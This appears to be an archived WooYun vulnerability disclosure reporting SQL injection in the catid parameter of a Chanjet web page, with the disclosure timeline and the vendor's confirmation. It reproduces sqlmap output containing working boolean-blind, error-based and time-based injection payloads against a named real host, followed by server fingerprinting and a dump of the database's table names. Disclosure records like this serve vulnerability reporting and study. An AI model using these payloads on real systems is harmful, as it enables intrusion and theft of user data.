WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
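2015-10-08: Details reported to the vendor; awaiting vendor response
2015-10-08: Vendor confirmed; details disclosed to the vendor only
2015-10-18: Details disclosed to core white hats and experts in the relevant field
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public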
http://zsk.chanjet.com/zice/index.php?content-app-category&catid=1
Injection point: catid
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: content-app-category&catid=1) AND 1999=1999 AND (5493=5493

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: content-app-category&catid=1) AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x717a6b7171,(SELECT (ELT(6262=6262,1))),0x71717a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7485=7485

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: content-app-category&catid=1) AND (SELECT * FROM (SELECT(SLEEP(5)))Dbnl) AND (1947=1947
---
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.19
back-end DBMS: MySQL 5.0
Database: usercenter
[31 tables]
+-----------------------+
| user_admins           |
| user_applications     |
| user_badwords         |
| user_domains          |
| user_failedlogins     |
| user_feeds            |
| user_friends          |
| user_mailqueue        |
| user_memberfields     |
| user_members          |
| user_mergemembers     |
| user_newpm            |
| user_notelist         |
| user_pm_indexes       |
| user_pm_lists         |
| user_pm_members       |
| user_pm_messages_0    |
| user_pm_messages_1    |
| user_pm_messages_2    |
| user_pm_messages_3    |
| user_pm_messages_4    |
| user_pm_messages_5    |
| user_pm_messages_6    |
| user_pm_messages_7    |
| user_pm_messages_8    |
| user_pm_messages_9    |
| user_protectedmembers |
| user_settings         |
| user_sqlcache         |
| user_tags             |
| user_vars             |
+-----------------------+
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-10-08 15:26
Thank you for your attention and support. The issue exists, and we are fixing it.
None yet